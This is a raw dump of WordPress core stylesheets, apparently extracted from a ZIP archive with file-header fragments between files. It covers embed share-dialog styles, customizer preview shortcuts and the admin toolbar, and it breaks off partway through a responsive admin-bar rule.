url("data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20viewBox%3D%270%200%2020%2020%27%3E%3Cpath%20d%3D%27M14.5%2012q1.24%200%202.12.88T17.5%2015t-.88%202.12-2.12.88-2.12-.88T11.5%2015q0-.34.09-.69l-4.38-2.3Q6.32%2013%205%2013q-1.24%200-2.12-.88T2%2010t.88-2.12T5%207q1.3%200%202.21.99l4.38-2.3q-.09-.35-.09-.69%200-1.24.88-2.12T14.5%202t2.12.88T17.5%205t-.88%202.12T14.5%208q-1.3%200-2.21-.99l-4.38%202.3Q8%209.66%208%2010t-.09.69l4.38%202.3q.89-.99%202.21-.99z%27%20fill%3D%27%23646970%27%2F%3E%3C%2Fsvg%3E"); display: none; } .js .dashicons-share { display: inline-block; } .wp-embed-share-dialog-open:hover .dashicons-share { background-image: url("data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20viewBox%3D%270%200%2020%2020%27%3E%3Cpath%20d%3D%27M14.5%2012q1.24%200%202.12.88T17.5%2015t-.88%202.12-2.12.88-2.12-.88T11.5%2015q0-.34.09-.69l-4.38-2.3Q6.32%2013%205%2013q-1.24%200-2.12-.88T2%2010t.88-2.12T5%207q1.3%200%202.21.99l4.38-2.3q-.09-.35-.09-.69%200-1.24.88-2.12T14.5%202t2.12.88T17.5%205t-.88%202.12T14.5%208q-1.3%200-2.21-.99l-4.38%202.3Q8%209.66%208%2010t-.09.69l4.38%202.3q.89-.99%202.21-.99z%27%20fill%3D%27%23135e96%27%2F%3E%3C%2Fsvg%3E"); } .wp-embed { padding: 25px; font-size: 14px; font-weight: 400; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; line-height: 1.5; color: #646970; background: #fff; border: 1px solid #dcdcde; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05); /* Clearfix */ overflow: auto; zoom: 1; } .wp-embed a { color: #646970; text-decoration: none; } .wp-embed a:hover { text-decoration: underline; } .wp-embed-featured-image { margin-bottom: 20px; } .wp-embed-featured-image img { width: 100%; height: auto; border: none; } .wp-embed-featured-image.square { float: left; max-width: 160px; margin-right: 20px; } .wp-embed p { margin: 0; } p.wp-embed-heading { margin: 0 0 15px; font-weight: 600; font-size: 22px; line-height: 1.3; } .wp-embed-heading a { color: #2c3338; } .wp-embed .wp-embed-more { color: #2271b1; text-decoration: underline; } .wp-embed-footer { display: table; width: 100%; margin-top: 30px; } .wp-embed-site-icon { position: absolute; top: 50%; left: 0; transform: translateY(-50%); height: 25px; width: 25px; border: 0; } .wp-embed-site-title { font-weight: 600; line-height: 1.78571428; } .wp-embed-site-title a { position: relative; display: inline-block; padding-left: 35px; } .wp-embed-site-title, .wp-embed-meta { display: table-cell; } .wp-embed-meta { text-align: right; white-space: nowrap; vertical-align: middle; } .wp-embed-comments, .wp-embed-share { display: inline; } .wp-embed-meta a:hover { text-decoration: none; color: #135e96; } .wp-embed-comments a { line-height: 1.78571428; display: inline-block; } .wp-embed-comments + .wp-embed-share { margin-left: 10px; } .wp-embed-share-dialog { position: absolute; top: 0; left: 0; right: 0; bottom: 0; background-color: #1d2327; background-color: rgba(0, 0, 0, 0.9); color: #fff; opacity: 1; transition: opacity .25s ease-in-out; } .wp-embed-share-dialog.hidden { opacity: 0; visibility: hidden; } .wp-embed-share-dialog-open, .wp-embed-share-dialog-close { margin: -8px 0 0; padding: 0; background: transparent; border: none; cursor: pointer; outline: none; } .wp-embed-share-dialog-open .dashicons, .wp-embed-share-dialog-close .dashicons { padding: 4px; } .wp-embed-share-dialog-open .dashicons { top: 8px; } .wp-embed-share-dialog-open:focus .dashicons, .wp-embed-share-dialog-close:focus .dashicons { box-shadow: 0 0 0 2px #2271b1; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; border-radius: 100%; } .wp-embed-share-dialog-close { position: absolute; top: 20px; right: 20px; font-size: 22px; } .wp-embed-share-dialog-close:hover { text-decoration: none; } .wp-embed-share-dialog-close .dashicons { height: 24px; width: 24px; background-size: 24px; } .wp-embed-share-dialog-content { height: 100%; transform-style: preserve-3d; overflow: hidden; } .wp-embed-share-dialog-text { margin-top: 25px; padding: 20px; } .wp-embed-share-tabs { margin: 0 0 20px; padding: 0; list-style: none; } .wp-embed-share-tab-button { display: inline-block; } .wp-embed-share-tab-button button { margin: 0; padding: 0; border: none; background: transparent; font-size: 16px; line-height: 1.3; color: #a7aaad; cursor: pointer; transition: color .1s ease-in; } .wp-embed-share-tab-button [aria-selected="true"] { color: #fff; } .wp-embed-share-tab-button button:hover { color: #fff; } .wp-embed-share-tab-button + .wp-embed-share-tab-button { margin: 0 0 0 10px; padding: 0 0 0 11px; border-left: 1px solid #a7aaad; } .wp-embed-share-tab[aria-hidden="true"] { display: none; } p.wp-embed-share-description { margin: 0; font-size: 14px; line-height: 1; font-style: italic; color: #a7aaad; } .wp-embed-share-input { box-sizing: border-box; width: 100%; border: none; height: 28px; margin: 0 0 10px; padding: 0 5px; font-size: 14px; font-weight: 400; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; line-height: 1.5; resize: none; cursor: text; } textarea.wp-embed-share-input { height: 72px; } html[dir="rtl"] .wp-embed-featured-image.square { float: right; margin-right: 0; margin-left: 20px; } html[dir="rtl"] .wp-embed-site-title a { padding-left: 0; padding-right: 35px; } html[dir="rtl"] .wp-embed-site-icon { margin-right: 0; margin-left: 10px; left: auto; right: 0; } html[dir="rtl"] .wp-embed-meta { text-align: left; } html[dir="rtl"] .wp-embed-share { margin-left: 0; margin-right: 10px; } html[dir="rtl"] .wp-embed-share-dialog-close { right: auto; left: 20px; } html[dir="rtl"] .wp-embed-share-tab-button + .wp-embed-share-tab-button { margin: 0 10px 0 0; padding: 0 11px 0 0; border-left: none; border-right: 1px solid #a7aaad; } PK!d; ; customize-preview-rtl.min.cssnu&1i/*! This file is auto-generated */ .customize-partial-refreshing{opacity:.25;transition:opacity .25s;cursor:progress}.customize-partial-refreshing.widget-customizer-highlighted-widget{box-shadow:none}.customize-partial-edit-shortcut,.widget .customize-partial-edit-shortcut{position:absolute;float:right;width:1px;height:1px;padding:0;margin:-1px -1px 0 0;border:0;background:0 0;color:transparent;box-shadow:none;outline:0;z-index:5}.customize-partial-edit-shortcut button,.widget .customize-partial-edit-shortcut button{position:absolute;right:-30px;top:2px;color:#fff;width:30px;height:30px;min-width:30px;min-height:30px;line-height:1!important;font-size:18px;z-index:5;background:#3582c4!important;border-radius:50%;border:2px solid #fff;box-shadow:0 2px 1px rgba(60,67,74,.15);text-align:center;cursor:pointer;box-sizing:border-box;padding:3px;animation-fill-mode:both;animation-duration:.4s;opacity:0;pointer-events:none;text-shadow:0 -1px 1px #135e96,-1px 0 1px #135e96,0 1px 1px #135e96,1px 0 1px #135e96}.wp-custom-header .customize-partial-edit-shortcut button{right:2px}.customize-partial-edit-shortcut button svg{fill:#fff;min-width:20px;min-height:20px;width:20px;height:20px;margin:auto}.customize-partial-edit-shortcut button:hover{background:#4f94d4!important}.customize-partial-edit-shortcut button:focus{box-shadow:0 0 0 2px #4f94d4}body.customize-partial-edit-shortcuts-shown .customize-partial-edit-shortcut button{animation-name:customize-partial-edit-shortcut-bounce-appear;pointer-events:auto}body.customize-partial-edit-shortcuts-hidden .customize-partial-edit-shortcut button{animation-name:customize-partial-edit-shortcut-bounce-disappear;pointer-events:none}.customize-partial-edit-shortcut-hidden .customize-partial-edit-shortcut button,.page-sidebar-collapsed .customize-partial-edit-shortcut button{visibility:hidden}@keyframes customize-partial-edit-shortcut-bounce-appear{20%,40%,60%,80%,from,to{animation-timing-function:cubic-bezier(0.215,0.610,0.355,1.000)}0%{opacity:0;transform:scale3d(.3,.3,.3)}20%{transform:scale3d(1.1,1.1,1.1)}40%{transform:scale3d(.9,.9,.9)}60%{opacity:1;transform:scale3d(1.03,1.03,1.03)}80%{transform:scale3d(.97,.97,.97)}to{opacity:1;transform:scale3d(1,1,1)}}@keyframes customize-partial-edit-shortcut-bounce-disappear{20%,40%,60%,80%,from,to{animation-timing-function:cubic-bezier(0.215,0.610,0.355,1.000)}0%{opacity:1;transform:scale3d(1,1,1)}20%{transform:scale3d(.97,.97,.97)}40%{opacity:1;transform:scale3d(1.03,1.03,1.03)}60%{transform:scale3d(.9,.9,.9)}80%{transform:scale3d(1.1,1.1,1.1)}to{opacity:0;transform:scale3d(.3,.3,.3)}}@media screen and (max-width:800px){.customize-partial-edit-shortcut button,.widget .customize-partial-edit-shortcut button{right:-32px}}@media screen and (max-width:320px){.customize-partial-edit-shortcut button,.widget .customize-partial-edit-shortcut button{right:-30px}}PK!o(a(a admin-bar.cssnuȯhtml { --wp-admin--admin-bar--height: 32px; scroll-padding-top: var(--wp-admin--admin-bar--height); } #wpadminbar * { height: auto; width: auto; margin: 0; padding: 0; position: static; text-shadow: none; text-transform: none; letter-spacing: normal; font-size: 13px; font-weight: 400; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; font-style: normal; line-height: 2.46153846; border-radius: 0; box-sizing: content-box; transition: none; -webkit-font-smoothing: subpixel-antialiased; /* Prevent Safari from switching to standard antialiasing on hover */ -moz-osx-font-smoothing: auto; /* Prevent Firefox from inheriting from themes that use other values */ } .rtl #wpadminbar * { font-family: Tahoma, sans-serif; } html:lang(he-il) .rtl #wpadminbar * { font-family: Arial, sans-serif; } #wpadminbar .ab-empty-item { cursor: default; } #wpadminbar .ab-empty-item, #wpadminbar a.ab-item, #wpadminbar > #wp-toolbar span.ab-label, #wpadminbar > #wp-toolbar span.noticon { color: #f0f0f1; } #wpadminbar #wp-admin-bar-site-name a.ab-item, #wpadminbar #wp-admin-bar-my-sites a.ab-item { white-space: nowrap; } #wpadminbar ul li:before, #wpadminbar ul li:after { content: normal; } #wpadminbar a, #wpadminbar a:hover, #wpadminbar a img, #wpadminbar a img:hover { border: none; text-decoration: none; background: none; box-shadow: none; } #wpadminbar a:focus, #wpadminbar a:active, #wpadminbar input[type="text"], #wpadminbar input[type="password"], #wpadminbar input[type="number"], #wpadminbar input[type="search"], #wpadminbar input[type="email"], #wpadminbar input[type="url"], #wpadminbar select, #wpadminbar textarea, #wpadminbar div { box-shadow: none; } #wpadminbar a:focus { /* Inherits transparent outline only visible in Windows High Contrast mode */ outline-offset: -1px; } #wpadminbar { direction: ltr; color: #c3c4c7; font-size: 13px; font-weight: 400; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; line-height: 2.46153846; height: 32px; position: fixed; top: 0; left: 0; width: 100%; min-width: 600px; /* match the min-width of the body in wp-admin/css/common.css */ z-index: 99999; background: #1d2327; /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } #wpadminbar .ab-sub-wrapper, #wpadminbar ul, #wpadminbar ul li { background: none; clear: none; list-style: none; margin: 0; padding: 0; position: relative; text-indent: 0; z-index: 99999; } #wpadminbar ul#wp-admin-bar-root-default>li { margin-right: 0; } #wpadminbar .quicklinks ul { text-align: left; } #wpadminbar li { float: left; } #wpadminbar .ab-empty-item { outline: none; } #wpadminbar .quicklinks a, #wpadminbar .quicklinks .ab-empty-item, #wpadminbar .shortlink-input { height: 32px; display: block; padding: 0 10px; margin: 0; } #wpadminbar .quicklinks > ul > li > a { padding: 0 8px 0 7px; } #wpadminbar .menupop .ab-sub-wrapper, #wpadminbar .shortlink-input { margin: 0; padding: 0; box-shadow: 0 3px 5px rgba(0, 0, 0, 0.2); background: #2c3338; display: none; position: absolute; float: none; } #wpadminbar .ab-top-menu > .menupop > .ab-sub-wrapper { min-width: 100%; } #wpadminbar .ab-top-secondary .menupop .ab-sub-wrapper { right: 0; left: auto; } #wpadminbar .ab-submenu { padding: 6px 0; } #wpadminbar .selected .shortlink-input { display: block; } #wpadminbar .quicklinks .menupop ul li { float: none; } #wpadminbar .quicklinks .menupop ul li a strong { font-weight: 600; } #wpadminbar .quicklinks .menupop ul li .ab-item, #wpadminbar .quicklinks .menupop ul li a strong, #wpadminbar .quicklinks .menupop.hover ul li .ab-item, #wpadminbar.nojs .quicklinks .menupop:hover ul li .ab-item, #wpadminbar .shortlink-input { line-height: 2; height: 26px; white-space: nowrap; min-width: 140px; } #wpadminbar .shortlink-input { width: 200px; } #wpadminbar.nojs li:hover > .ab-sub-wrapper, #wpadminbar li.hover > .ab-sub-wrapper { display: block; /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } #wpadminbar .menupop li:hover > .ab-sub-wrapper, #wpadminbar .menupop li.hover > .ab-sub-wrapper { margin-left: 100%; margin-top: -32px; } #wpadminbar .ab-top-secondary .menupop li:hover > .ab-sub-wrapper, #wpadminbar .ab-top-secondary .menupop li.hover > .ab-sub-wrapper { margin-left: 0; left: inherit; right: 100%; } #wpadminbar:not(.mobile) .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojq .quicklinks .ab-top-menu > li > .ab-item:focus, #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item, #wpadminbar .ab-top-menu > li.hover > .ab-item { background: #2c3338; color: #72aee6; } #wpadminbar:not(.mobile) > #wp-toolbar li:hover span.ab-label, #wpadminbar > #wp-toolbar li.hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar a:focus span.ab-label { color: #72aee6; } #wpadminbar > #wp-toolbar > #wp-admin-bar-root-default .ab-icon, #wpadminbar .ab-icon, #wpadminbar .ab-item:before, .wp-admin-bar-arrow { position: relative; float: left; font: normal 20px/1 dashicons; padding: 4px 0; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; background-image: none !important; margin-right: 6px; } #wpadminbar .ab-icon:before, #wpadminbar .ab-item:before, #wpadminbar #adminbarsearch:before { color: #a7aaad; color: rgba(240, 246, 252, 0.6); } #wpadminbar .ab-icon:before, #wpadminbar .ab-item:before, #wpadminbar #adminbarsearch:before { position: relative; transition: color .1s ease-in-out; } #wpadminbar .ab-label { display: inline-block; height: 32px; } #wpadminbar .ab-submenu .ab-item { color: #c3c4c7; color: rgba(240, 246, 252, 0.7); } #wpadminbar .quicklinks .menupop ul li a, #wpadminbar .quicklinks .menupop ul li a strong, #wpadminbar .quicklinks .menupop.hover ul li a, #wpadminbar.nojs .quicklinks .menupop:hover ul li a { color: #c3c4c7; color: rgba(240, 246, 252, 0.7); } #wpadminbar .quicklinks .menupop ul li a:hover, #wpadminbar .quicklinks .menupop ul li a:focus, #wpadminbar .quicklinks .menupop ul li a:hover strong, #wpadminbar .quicklinks .menupop ul li a:focus strong, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a, #wpadminbar .quicklinks .menupop.hover ul li a:hover, #wpadminbar .quicklinks .menupop.hover ul li a:focus, #wpadminbar .quicklinks .menupop.hover ul li div[tabindex]:hover, #wpadminbar .quicklinks .menupop.hover ul li div[tabindex]:focus, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus, #wpadminbar li:hover .ab-icon:before, #wpadminbar li:hover .ab-item:before, #wpadminbar li a:focus .ab-icon:before, #wpadminbar li .ab-item:focus:before, #wpadminbar li .ab-item:focus .ab-icon:before, #wpadminbar li.hover .ab-icon:before, #wpadminbar li.hover .ab-item:before, #wpadminbar li:hover #adminbarsearch:before, #wpadminbar li #adminbarsearch.adminbar-focused:before { color: #72aee6; } #wpadminbar.mobile .quicklinks .ab-icon:before, #wpadminbar.mobile .quicklinks .ab-item:before { color: #c3c4c7; } #wpadminbar.mobile .quicklinks .hover .ab-icon:before, #wpadminbar.mobile .quicklinks .hover .ab-item:before { color: #72aee6; } #wpadminbar .menupop .menupop > .ab-item .wp-admin-bar-arrow:before, #wpadminbar .ab-top-secondary .menupop .menupop > .ab-item:before { position: absolute; font: normal 17px/1 dashicons; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } #wpadminbar .menupop .menupop > .ab-item { display: block; padding-right: 2em; } #wpadminbar .menupop .menupop > .ab-item .wp-admin-bar-arrow:before { top: 1px; right: 10px; padding: 4px 0; content: "\f139"; content: "\f139" / ''; color: inherit; } #wpadminbar .ab-top-secondary .menupop .menupop > .ab-item { padding-left: 2em; padding-right: 1em; } #wpadminbar .ab-top-secondary .menupop .menupop > .ab-item .wp-admin-bar-arrow:before { top: 1px; left: 6px; content: "\f141"; content: "\f141" / ''; } #wpadminbar .quicklinks .menupop ul.ab-sub-secondary { display: block; position: relative; right: auto; margin: 0; box-shadow: none; } #wpadminbar .quicklinks .menupop ul.ab-sub-secondary, #wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu { background: #3c434a; } #wpadminbar .quicklinks .menupop .ab-sub-secondary > li > a:hover, #wpadminbar .quicklinks .menupop .ab-sub-secondary > li .ab-item:focus a { color: #72aee6; } #wpadminbar .quicklinks a span#ab-updates { background: #f0f0f1; color: #2c3338; display: inline; padding: 2px 5px; font-size: 10px; font-weight: 600; border-radius: 10px; } #wpadminbar .quicklinks a:hover span#ab-updates { background: #fff; color: #000; } #wpadminbar .ab-top-secondary { float: right; } #wpadminbar ul li:last-child, #wpadminbar ul li:last-child .ab-item { box-shadow: none; } /** * Recovery Mode */ #wpadminbar #wp-admin-bar-recovery-mode { color: #fff; background-color: #d63638; } #wpadminbar .ab-top-menu > #wp-admin-bar-recovery-mode.hover >.ab-item, #wpadminbar.nojq .quicklinks .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus { color: #fff; background-color: #d63638; } /** * My Account */ #wp-admin-bar-my-account > ul { min-width: 198px; } #wp-admin-bar-my-account:not(.with-avatar) > .ab-item { display: inline-block; } #wp-admin-bar-my-account > .ab-item:before { content: "\f110"; content: "\f110" / ''; top: 2px; float: right; margin-left: 6px; margin-right: 0; } #wp-admin-bar-my-account.with-avatar > .ab-item:before { display: none; content: none; } #wp-admin-bar-my-account.with-avatar > ul { min-width: 270px; } #wpadminbar #wp-admin-bar-user-actions > li { margin-left: 16px; margin-right: 16px; } #wpadminbar #wp-admin-bar-user-actions.ab-submenu { padding: 6px 0 12px; } #wpadminbar #wp-admin-bar-my-account.with-avatar #wp-admin-bar-user-actions > li { margin-left: 88px; } #wpadminbar #wp-admin-bar-user-info { margin-top: 6px; margin-bottom: 15px; height: auto; background: none; } #wp-admin-bar-user-info .avatar { position: absolute; left: -72px; top: 4px; width: 64px; height: 64px; } #wpadminbar #wp-admin-bar-user-info a { background: none; height: auto; } #wpadminbar #wp-admin-bar-user-info span { background: none; padding: 0; height: 18px; } #wpadminbar #wp-admin-bar-user-info .display-name, #wpadminbar #wp-admin-bar-user-info .username { display: block; } #wpadminbar #wp-admin-bar-user-info .username { color: #a7aaad; font-size: 11px; } #wpadminbar #wp-admin-bar-my-account.with-avatar > .ab-empty-item img, #wpadminbar #wp-admin-bar-my-account.with-avatar > a img { width: auto; height: 16px; padding: 0; border: 1px solid #8c8f94; background: #f0f0f1; line-height: 1.84615384; vertical-align: middle; margin: -4px 0 0 6px; float: none; display: inline; } /** * WP Logo */ #wpadminbar #wp-admin-bar-wp-logo > .ab-item .ab-icon { width: 15px; height: 20px; margin-right: 0; padding: 6px 0 5px; } #wpadminbar #wp-admin-bar-wp-logo > .ab-item { padding: 0 7px; } #wpadminbar #wp-admin-bar-wp-logo > .ab-item .ab-icon:before { content: "\f120"; content: "\f120" / ''; top: 2px; } /* * My Sites & Site Title */ #wpadminbar .quicklinks li .blavatar { display: inline-block; vertical-align: middle; font: normal 16px/1 dashicons !important; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; color: #f0f0f1; } #wpadminbar .quicklinks li a:hover .blavatar, #wpadminbar .quicklinks li a:focus .blavatar, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a .blavatar { color: #72aee6; } #wpadminbar .quicklinks li img.blavatar, #wpadminbar .quicklinks li div.blavatar:before { height: 16px; width: 16px; margin: 0 8px 2px -2px; } #wpadminbar .quicklinks li div.blavatar:before { content: "\f120"; content: "\f120" / ''; display: inline-block; } #wpadminbar #wp-admin-bar-appearance { margin-top: -12px; } #wpadminbar #wp-admin-bar-my-sites > .ab-item:before, #wpadminbar #wp-admin-bar-site-name > .ab-item:before { content: "\f541"; content: "\f541" / ''; top: 2px; } #wpadminbar #wp-admin-bar-site-editor > .ab-item:before { content: "\f100"; content: "\f100" / ''; top: 2px; } #wpadminbar #wp-admin-bar-customize > .ab-item:before { content: "\f540"; content: "\f540" / ''; top: 2px; } #wpadminbar #wp-admin-bar-edit > .ab-item:before { content: "\f464"; content: "\f464" / ''; top: 2px; } #wpadminbar #wp-admin-bar-site-name > .ab-item:before { content: "\f226"; content: "\f226" / ''; } .wp-admin #wpadminbar #wp-admin-bar-site-name > .ab-item:before { content: "\f102"; content: "\f102" / ''; } /** * Comments */ #wpadminbar #wp-admin-bar-comments .ab-icon { margin-right: 6px; } #wpadminbar #wp-admin-bar-comments .ab-icon:before { content: "\f101"; content: "\f101" / ''; top: 3px; } #wpadminbar #wp-admin-bar-comments .count-0 { opacity: .5; } /** * New Content */ #wpadminbar #wp-admin-bar-new-content .ab-icon:before { content: "\f132"; content: "\f132" / ''; top: 4px; } /** * Updates */ #wpadminbar #wp-admin-bar-updates .ab-icon:before { content: "\f463"; content: "\f463" / ''; top: 2px; } #wpadminbar #wp-admin-bar-updates.spin .ab-icon:before { display: inline-block; animation: rotation 2s infinite linear; } @media (prefers-reduced-motion: reduce) { #wpadminbar #wp-admin-bar-updates.spin .ab-icon:before { animation: none; } } /** * Search */ #wpadminbar #wp-admin-bar-search .ab-item { padding: 0; background: transparent; } #wpadminbar #adminbarsearch { position: relative; height: 32px; padding: 0 2px; z-index: 1; } #wpadminbar #adminbarsearch:before { position: absolute; top: 6px; left: 5px; z-index: 20; font: normal 20px/1 dashicons !important; content: "\f179"; content: "\f179" / ''; speak: never; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } /* The admin bar search field needs to reset many styles that might be inherited from the active Theme CSS. See ticket #40313. */ #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input { display: inline-block; float: none; position: relative; z-index: 30; font-size: 13px; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; line-height: 1.84615384; text-indent: 0; height: 24px; width: 24px; max-width: none; padding: 0 3px 0 24px; margin: 0; color: #c3c4c7; background-color: rgba(255, 255, 255, 0); border: none; outline: none; cursor: pointer; box-shadow: none; box-sizing: border-box; transition-duration: 400ms; transition-property: width, background; transition-timing-function: ease; } #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus { z-index: 10; color: #000; width: 200px; background-color: rgba(255, 255, 255, 0.9); cursor: text; border: 0; } #wpadminbar #adminbarsearch .adminbar-button { display: none; } /** * Customize support classes */ .no-customize-support .hide-if-no-customize, .customize-support .hide-if-customize, .no-customize-support #wpadminbar .hide-if-no-customize, .no-customize-support.wp-core-ui .hide-if-no-customize, .no-customize-support .wp-core-ui .hide-if-no-customize, .customize-support #wpadminbar .hide-if-customize, .customize-support.wp-core-ui .hide-if-customize, .customize-support .wp-core-ui .hide-if-customize { display: none; } /* Skip link */ #wpadminbar .screen-reader-text, #wpadminbar .screen-reader-text span { border: 0; clip-path: inset(50%); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; word-wrap: normal !important; } #wpadminbar .screen-reader-shortcut { position: absolute; top: -1000em; left: 6px; height: auto; width: auto; display: block; font-size: 14px; font-weight: 600; padding: 15px 23px 14px; background: #f0f0f1; color: #2271b1; z-index: 100000; line-height: normal; text-decoration: none; } #wpadminbar .screen-reader-shortcut:focus { top: 7px; background: #f0f0f1; box-shadow: 0 0 2px 2px rgba(0, 0, 0, 0.6); } @media screen and (max-width: 782px) { html { --wp-admin--admin-bar--height: 46px; } /* Toolbar Touchification*/ html #wpadminbar { height: 46px; min-width: 240px; /* match the min-width of the body in wp-admin/css/common.css */ } #wpadminbar * { font-size: 14px; font-weight: 400; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; line-height: 2.28571428; } #wpadminbar .quicklinks > ul > li > a, #wpadminbar .quicklinks .ab-empty-item { padding: 0; height: 46px; line-height: 3.28571428; width: auto; } #wpadminbar .ab-icon { font: 40px/1 dashicons !important; margin: 0; padding: 0; width: 52px; height: 46px; text-align: center; } #wpadminbar .ab-icon:before { text-align: center; } #wpadminbar .ab-submenu { padding: 0; } #wpadminbar #wp-admin-bar-site-name a.ab-item, #wpadminbar #wp-admin-bar-my-sites a.ab-item, #wpadminbar #wp-admin-bar-my-account a.ab-item { text-overflow: clip; } #wpadminbar .quicklinks .menupop ul li .ab-item, #wpadminbar .quicklinks .menupop ul li a strong, #wpadminbar .quicklinks .menupop.hover ul li .ab-item, #wpadminbar.nojs .quicklinks .menupop:hover ul li .ab-item, #wpadminbar .shortlink-input { line-height: 1.6; } #wpadminbar .ab-label { border: 0; clip-path: inset(50%); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; word-wrap: normal !important; } #wpadminbar .menupop li:hover > .ab-sub-wrapper, #wpadminbar .menupop li.hover > .ab-sub-wrapper { margin-top: -46px; } #wpadminbar .ab-top-menu .menupop .ab-sub-wrapper .menupop > .ab-item { padding-right: 30px; } #wpadminbar .menupop .menupop > .ab-item:before { top: 10px; right: 6px; } #wpadminbar .ab-top-menu > .menupop > .ab-sub-wrapper .ab-item { font-size: 16px; padding: 8px 16px; } #wpadminbar .ab-top-menu > .menupop > .ab-sub-wrapper a:empty { display: none; } /* WP logo */ #wpadminbar #wp-admin-bar-wp-logo > .ab-item { padding: 0; } #wpadminbar #wp-admin-bar-wp-logo > .ab-item .ab-icon { padding: 0; width: 52px; height: 46px; text-align: center; vertical-align: top; } #wpadminbar #wp-admin-bar-wp-logo > .ab-item .ab-icon:before { font: 28px/1 dashicons !important; top: -3px; } #wpadminbar .ab-icon, #wpadminbar .ab-item:before { padding: 0; } /* My Sites and "Site Title" menu */ #wpadminbar #wp-admin-bar-my-sites > .ab-item, #wpadminbar #wp-admin-bar-site-name > .ab-item, #wpadminbar #wp-admin-bar-site-editor > .ab-item, #wpadminbar #wp-admin-bar-customize > .ab-item, #wpadminbar #wp-admin-bar-edit > .ab-item, #wpadminbar #wp-admin-bar-my-account > .ab-item { text-indent: 100%; white-space: nowrap; overflow: hidden; width: 52px; padding: 0; color: #a7aaad; /* @todo not needed? this text is hidden */ position: relative; } #wpadminbar > #wp-toolbar > #wp-admin-bar-root-default .ab-icon, #wpadminbar .ab-icon, #wpadminbar .ab-item:before { padding: 0; margin-right: 0; } #wpadminbar #wp-admin-bar-edit > .ab-item:before, #wpadminbar #wp-admin-bar-my-sites > .ab-item:before, #wpadminbar #wp-admin-bar-site-name > .ab-item:before, #wpadminbar #wp-admin-bar-site-editor > .ab-item:before, #wpadminbar #wp-admin-bar-customize > .ab-item:before, #wpadminbar #wp-admin-bar-my-account > .ab-item:before { display: block; text-indent: 0; font: normal 32px/1 dashicons; top: 7px; width: 52px; text-align: center; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } #wpadminbar #wp-admin-bar-appearance { margin-top: 0; } #wpadminbar .quicklinks li .blavatar:before { display: none; } /* Search */ #wpadminbar #wp-admin-bar-search { display: none; } /* New Content */ #wpadminbar #wp-admin-bar-new-content .ab-icon:before { top: 0; line-height: 1.26; height: 46px !important; text-align: center; width: 52px; display: block; } /* Updates */ #wpadminbar #wp-admin-bar-updates { text-align: center; } #wpadminbar #wp-admin-bar-updates .ab-icon:before { top: 3px; } /* Comments */ #wpadminbar #wp-admin-bar-comments .ab-icon { margin: 0; } #wpadminbar #wp-admin-bar-comments .ab-icon:before { display: block; font-size: 34px; height: 46px; line-height: 1.38235294; top: 0; } /* My Account */ #wpadminbar #wp-admin-bar-my-account > a { position: relative; white-space: nowrap; text-indent: 150%; /* More than 100% indention is needed since this element has padding */ width: 28px; padding: 0 10px; overflow: hidden; /* Prevent link text from forcing horizontal scrolling on mobile */ } #wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar > a img { position: absolute; top: 13px; right: 10px; width: 26px; height: 26px; } #wpadminbar #wp-admin-bar-user-actions.ab-submenu { padding: 0; } #wpadminbar #wp-admin-bar-user-actions.ab-submenu img.avatar { display: none; } #wpadminbar #wp-admin-bar-my-account.with-avatar #wp-admin-bar-user-actions > li { margin: 0; } #wpadminbar #wp-admin-bar-user-info .display-name { height: auto; font-size: 16px; line-height: 1.5; color: #f0f0f1; } #wpadminbar #wp-admin-bar-user-info a { padding-top: 4px; } #wpadminbar #wp-admin-bar-user-info .username { line-height: 0.8 !important; margin-bottom: -2px; } /* Show only default top level items */ #wp-toolbar > ul > li { display: none; } #wpadminbar li#wp-admin-bar-menu-toggle, #wpadminbar li#wp-admin-bar-wp-logo, #wpadminbar li#wp-admin-bar-my-sites, #wpadminbar li#wp-admin-bar-updates, #wpadminbar 